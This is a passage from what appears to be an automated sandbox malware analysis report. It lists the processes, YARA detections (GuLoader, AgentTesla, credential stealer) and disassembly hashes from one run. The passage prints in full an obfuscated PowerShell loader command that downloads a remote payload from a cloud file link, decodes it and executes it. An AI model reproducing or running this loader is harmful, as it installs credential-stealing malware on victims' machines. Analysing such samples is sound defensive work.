'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;"
                                                                                  Imagebase:0x7ff6e3d50000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:07:53:24
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:07:53:26
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
                                                                                  Imagebase:0x7ff783250000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:07:53:33
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNedlg1Tvist6Physo1Hespe)Taleg ');Multikunsts (Phenolsulphonate 'Multi$ BogpgMahoglForudounsolbYmpnia,angblSynta:ernriT ,esueAddergfy kllAn ipvA bitrLamelkNummesHeatea.agterNum.rbButyreOverfjCurvid ImmueInimisUnidi=C ris$HomosU ForhnC ondb LivsaU.nacpGnis t Vil,iSm.llsEklateunbra.Cu sosSquilpUdflylDrowniOppilthypoc(Vider$k.nceP Der,oHalfll Do ee LarymTr thi Fde.sectroeLand,rFondsef,sibsFabri)Diskk ');$Unbaptise=$Teglvrksarbejdes[0];Multikunsts (Phenolsulphonate 'Bruge$Reg,lgD.ouglIllegoqueneb mustaSo.welUni,t:blankH OrgavAccule StetdSiddeeSti umGavageIntimlBloms= seneNMag.seArbejwKo ce-SplitOApostb.aratjNonnae ayercInfo tDudel A,tomSFerieyBrus s ,asttM,croe ektm K,rs.DomstN LovpeGur dtRentr.FodboWStrope abonb SmilC,utoklNecroiDe oreH,mannFjerptsamme ');Multikunsts (Phenolsulphonate 'Emp.t$ PrimHImpervInfleeSkaerdUhv seFactumKi gheGrns.lBenyt.T iolHpr.deeNybega Selvd Impoe Sjo.rAntissCo se[ Disk$Rigi.DAren.i affegIridotWor he,eutrr NyheiScutisWorkwkRingleElect]Rando=Tempe$Nit,hHun,inyDimpsdMarihrBottooNytthrChr shS,akki addezstaalaFrste ');$Trichomatosis=Phenolsulphonate ' RadiHInstrvDemulePreexdTolueeFe lvmUnra.ePrimalUdsen.C.untD Tw,noMuddyw ovanSiam.lPertioFlydeastrmkdT.abeFPictuiPatrolLan.beBetyd(Tandp$PlougUFerlinOpbygb OssiaRallypUdtr.t GiviiFlabesUndepe Pist,Dyrep$ReforSLoftekVin srkmperd dr.wdor alePeskyr apo.eTraadrFilteeArresnSans,dEnrinet,anssCardi) Fi,k ';$Trichomatosis=$funktionstegningens[1]+$Trichomatosis;$Skrddererendes=$funktionstegningens[0];Multikunsts (Phenolsulphonate ' Klud$ProdugSmeltlReovioEpanobUnpreaToteml rum: ugenhElocuefotogl D spi fteu M,utmVurdeeBurthtBladds D kn= Leje( urisTHeelle.etrasKontitD.tin-Fort,PPreveaherret Dellh,rger A ros$RefleSPlastkovinerDiverdrumbud DowcePretrrBev deS ammrFor.ue forknKristdRegleeKommusDupsk)omstn ');while (!$heliumets) {Multikunsts (Phenolsulphonate 'Vager$Anbrig .ewilBilraoOrmazb lukaAllerl .ndi:KetupE demonlitzdvVanadeDyr hjKabins D agkTrenco HellmRech.mHa esu,eedinBjergi Uni,kSupera rypttSol niFlaado,igmenVedheeHyfeunO inesHager=Disen$EksamtG.melr Sekvusign.e pneu ') ;Multikunsts $Trichomatosis;Multikunsts (Phenolsulphonate 'MiscoSPoroct S.ssaLophorflyvetCalyc-PrescS P.eslBeslue.kelleProvspProvi Spal.4Hv.sk ');Multikunsts (Phenolsulphonate 'Syne.$premogN.taal uttoo TrimbKnobuaProfel Kryd:HmosthNonpeeSeatwlIken,iH ldbuStyptmOut.leL kertOvertsUnch.= Disl(TrombTSpr neZoothsCoop t.enna-FrustPPrustaSo rctFiksehVrigh Radio$ArendSBin,mkTrff rhumhudBoatsdFingee,orskrHost,eReadirFors,ePlatonTor,tdUnfureBathys Japo)Strep ') ;Multikunsts (Phenolsulphonate 'Frema$DiphegAge dlJustioIsophbGenina SniplMassa: Lo,aI epefnBroadtTer.orjonosaChromnEffers TrypiPinkitKompei wa.nvboot.ebromilOpslay Fesc=Arnfr$TraskgStranl lesio Han,bAttesa Lua lDogtr:ForbrF.avnea bad.sEpicetPetarlNucleg unstg,irmaehellelKolonsThiopeGlubhrM.ttenLi laeJubbesSladr+excus+ So,s%Stenc$UnburTThickeKrig gScavelB ssevAgterrOsprekP.antsV rieaI oburUnsupbAnodieTan,sj .imed Omste Rek,sKirke.LagtecLoxodoLeptiuAdvecn Acyltre,ol ') ;$Unbaptise=$Teglvrksarbejdes[$Intransitively];}Multikunsts (Phenolsulphonate 'Boot.$ ArkigAnalylClamaoPetrob DragaattaclRegen:KonjuRGadekePresie S.olvundubiTongmdBra.ceS.cernLjertc demoeFilmk .bre= Spo, kerygG ha.ieFrosttWilli-KopisC Systo NonenPrfertKorpueThrean log,tLacew Sper.$ ArgySDe.takov.rprSkjoldPounddKa ege rapr FyreeKon.rrTo deeDuodrnBl dgdMotioeDelins Snug ');Multikunsts (Phenolsulphonate 'Coppe$.illeg ShamlS.ampo.sksnbM skiaFu igldefen:Tr,inACowpadHoc,er,tovteTillgnMyoloaUnautl,ampeeLydincBalant.topfo CentmOu ruyOvert Spumo=Marke Null[Srg dSFabuly noggsUdefrtDromeePr,apmUnfra.ScreeCSl,beoAlantnA canvUfremeMus.irReacktCandy]Areol:Vanro:de.ilFSkovmrFrodio,roatmUv.nnBPern.a B,ozsSubeleInter6 krmm4.eviaSPos,mtp.etirKnlfti,ertin M tagT lla( B mb$ MonoRAdganeEditaeAftrrvUnproiIndgidIntereeksponUn.ercTapwoeNeo o)Arun, ');Multikunsts (Phenolsulphonate ' Opdi$RattogSme,glhidsio Ldreb Sp daForcel Arbo:dualiD RebeyOestrrS traeLandbpH,anda.nthrrNeo,hkNatioeAurelnSky,d Neu.=Fa,at Infer[AngelSSuperyUnpursCropptHumpleVi.kemautoi.AutocTHorseeKontox BundtAf ek.SpyttESvmmenMyriccDeu,eoDybdedCho.di Wiren kavag Vitt]athir:Regns: offeALuannSEncykCUlt.aIsequeICoxit.Kit.yGSpoereNr.sttN.neqSAfluktFl.ntrCleidi CiganPu itg kreo(Quill$Ekse Aknibtd ElekrAlisoePosttnRekreaTranslIndkoeUdskac FjodtPlan,oC lqum Mo ayVelvi)Skrat ');Multikunsts (Phenolsulphonate 'Ante.$.eatlgStrailadmo.oTran,bR,sula Sal lKostu:,orteR CavauVgav tNs.ebtRecgee aduldBonde1,urit7 Zion2Hgted= dmin$BltedDKbes.yUncomrSu.akehighbpScutkaPseudr ,avokGle.me,eotrn Opsl.So,acs,priluTunnebTernssSlvrvtInsusr Bul.i kulnBrgedgFarmb(Posit2Skuff9 Impl4Bello9 Hils2Edwar8Naomi,Amman2 Dors6neddy9 hakk8Jeopa7 ono)Pross ');Multikunsts $Rutted172;"
                                                                                  Imagebase:0xdf0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2677071576.0000000005FE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2686037167.0000000009DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:07:53:34
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:07:53:52
                                                                                  Start date:23/04/2024
                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                  Imagebase:0x6a0000
                                                                                  File size:516'608 bytes
                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3597768413.0000000004720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Executed Functions

                                                                                    Function 00007FFD343DCED6 Relevance: .5, Instructions: 492COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6bc553c56f9f475327a4940f6bc14faae0e1fbd3b79a313b7b69165ffac2ae89
                                                                                    • Instruction ID: a7ead1cd39b32277d1d99c5aab7a5fde672cc53e04a580223b28a13708f54dc8
                                                                                    • Opcode Fuzzy Hash: 6bc553c56f9f475327a4940f6bc14faae0e1fbd3b79a313b7b69165ffac2ae89
                                                                                    • Instruction Fuzzy Hash: 32028330A09A4E8FEBA8EF28D8957F937E1FF56300F04427AD44DC7291CB79A9458B41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343DDC82 Relevance: .5, Instructions: 470COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 475661fa2bea2ad010dbadaabcb712634f34b0c2fb32ff758d88cf4487586a3e
                                                                                    • Instruction ID: 05cdcda00e838da33b4b109a082bc95675332de565e8b2def83379feaf4cd531
                                                                                    • Opcode Fuzzy Hash: 475661fa2bea2ad010dbadaabcb712634f34b0c2fb32ff758d88cf4487586a3e
                                                                                    • Instruction Fuzzy Hash: 6AF1A630A09A4E8FEBA8EF28C8A57F977D1FF56310F04423AD44DC7295CE79A5448B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343DCF51 Relevance: .5, Instructions: 466COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c32fb97e1b40bbbe6c9c385ce86177c8e2aa9844bf242ba3488d02efe7c982a5
                                                                                    • Instruction ID: 3ab275f072dae7362d1fea0c41dd3a4ea876b66833fcb309c8271f04d4fc41d2
                                                                                    • Opcode Fuzzy Hash: c32fb97e1b40bbbe6c9c385ce86177c8e2aa9844bf242ba3488d02efe7c982a5
                                                                                    • Instruction Fuzzy Hash: A3F16130A19A4E8FEBA8EF28D8957F937D1FB56300F10423AD80DC7291CF79A9458B41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343DDD01 Relevance: .4, Instructions: 441COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 726521f49f2b623a3852dcbe57ca341b11a4f229d2698291da9c453fdeaf5d3c
                                                                                    • Instruction ID: c658a87a9d91b4752ed708a7b92f2db62751f6ee6957be90af779a5eaa81dd2a
                                                                                    • Opcode Fuzzy Hash: 726521f49f2b623a3852dcbe57ca341b11a4f229d2698291da9c453fdeaf5d3c
                                                                                    • Instruction Fuzzy Hash: BFE17630A19A4D8FEBA8EF28C8A57F977D1FF55311F10423AD80DC7295CE79A9448B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343D3945 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                    • Instruction ID: a7da7cb79c9dfca14f3196ae39e7a475c4e63e67c93ea7d206dbd6f8176ed565
                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                    • Instruction Fuzzy Hash: 7A01A73020CB0C4FD748EF4CE051AA5B3E0FF85320F10062DE58AC3651D636E882CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD344A4CD1 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2862518327.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd344a0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a0c1031a66a850cb4443a853835921896cd181e89ca755986430c012a22b304a
                                                                                    • Instruction ID: 794845b0101074030bb3449078bace7eccbd266137da611d4b5b172e07abc4f6
                                                                                    • Opcode Fuzzy Hash: a0c1031a66a850cb4443a853835921896cd181e89ca755986430c012a22b304a
                                                                                    • Instruction Fuzzy Hash: 85E09B32F0E5584FEB55EAACA4551DCBBE0EB59221F14117FE04DD3143D9295841C350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343D3BFB Relevance: 3.2, Strings: 2, Instructions: 690COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0f[4$Pc[4
                                                                                    • API String ID: 0-2913142403
                                                                                    • Opcode ID: 68fc8ede505f66a7f27da3be67076b7db69dc6387d74affa851a7304b4b149c5
                                                                                    • Instruction ID: b931ba691d9d10d9458123f902be988ac97c1e2b92b5ab664635172b2c97a405
                                                                                    • Opcode Fuzzy Hash: 68fc8ede505f66a7f27da3be67076b7db69dc6387d74affa851a7304b4b149c5
                                                                                    • Instruction Fuzzy Hash: 34222732B0DA9A4FDB55FB6CD4A15E97BE0FF96321B140077C148C7183CA39AC868791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343D6238 Relevance: .5, Instructions: 461COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cfd626f284cd47d13c084c7532a75b035d44a3f3e9cc6001cb0c5dd09ad2a457
                                                                                    • Instruction ID: 51ac787e3eff64153132af62f4fdfc1bd2e4bfb6f241b8359a0b6342aeca0cf2
                                                                                    • Opcode Fuzzy Hash: cfd626f284cd47d13c084c7532a75b035d44a3f3e9cc6001cb0c5dd09ad2a457
                                                                                    • Instruction Fuzzy Hash: ABE12722A4E7824FE356FB6C94F51E57BE0EF53314B1400BBC599CB0A3ED2A6846C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343D2658 Relevance: .2, Instructions: 214COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5222f53f40589460cbc03230c84afc8852f7d038fe0aa451c2aea3bb7cf65b9a
                                                                                    • Instruction ID: 3f6c61a31517c71069e28e5b6a33f669fac8f6a6c58ffacba19a34370cfe2cea
                                                                                    • Opcode Fuzzy Hash: 5222f53f40589460cbc03230c84afc8852f7d038fe0aa451c2aea3bb7cf65b9a
                                                                                    • Instruction Fuzzy Hash: B3614267A4F7D20FE76366385CB61E53FE0DF5326470900B7C584CB493ED2E184AA262
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00007FFD343D53F2 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2861558258.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffd343d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4591e4f029d543965caa12c69eb99b820a967cbbf6d14a183503bced8dadd5e3
                                                                                    • Instruction ID: 6da6a72f30e5423ccdcb0a2f4ef9eb1b7ceb48fd62c2a6a28c015974f98d10f8
                                                                                    • Opcode Fuzzy Hash: 4591e4f029d543965caa12c69eb99b820a967cbbf6d14a183503bced8dadd5e3
                                                                                    • Instruction Fuzzy Hash: 0021F857F4E2A21FF35166ACA8F61EA37E4EF532367190073CA44C7093AD1E18475693
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    Function 07A12BA0 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: kOB
                                                                                    • API String ID: 0-517033677
                                                                                    • Opcode ID: 392e014a5d7ff2d4e4de0e5dbb3d621c64ae8c6d60bdb49dce8f5593dd1b7d95
                                                                                    • Instruction ID: 0c150d6642f913201838fab97460e90584d69103507aab229733504c865b44d6
                                                                                    • Opcode Fuzzy Hash: 392e014a5d7ff2d4e4de0e5dbb3d621c64ae8c6d60bdb49dce8f5593dd1b7d95
                                                                                    • Instruction Fuzzy Hash: 731239B2B04216CFEB259B68C8117BABBA2AFC5654F14C0BAD515CB691EF31CC41C792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A18898 Relevance: 1.0, Instructions: 1033COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d52fd7ed93d30b3ff69b63cce99740deceb8ae1fd45aea757365747e6acf12e3
                                                                                    • Instruction ID: 5e010500cd3e196f56c21ed1c1896a018ec8277137493511bddc65a8364dc066
                                                                                    • Opcode Fuzzy Hash: d52fd7ed93d30b3ff69b63cce99740deceb8ae1fd45aea757365747e6acf12e3
                                                                                    • Instruction Fuzzy Hash: 0B92D1B0B00315DFEB24DB68C850BAABBB2EFC5314F1480AAD515AB745DB75EC41CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A17D70 Relevance: .7, Instructions: 741COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 672a78fb4ea671d6a8f0a87d652791d2b3318c176977d8b4c62199f0c903c2bd
                                                                                    • Instruction ID: 30a1b724e63a6f95e9d0ca6afda05f72703894303cd17e0bedb6270225679345
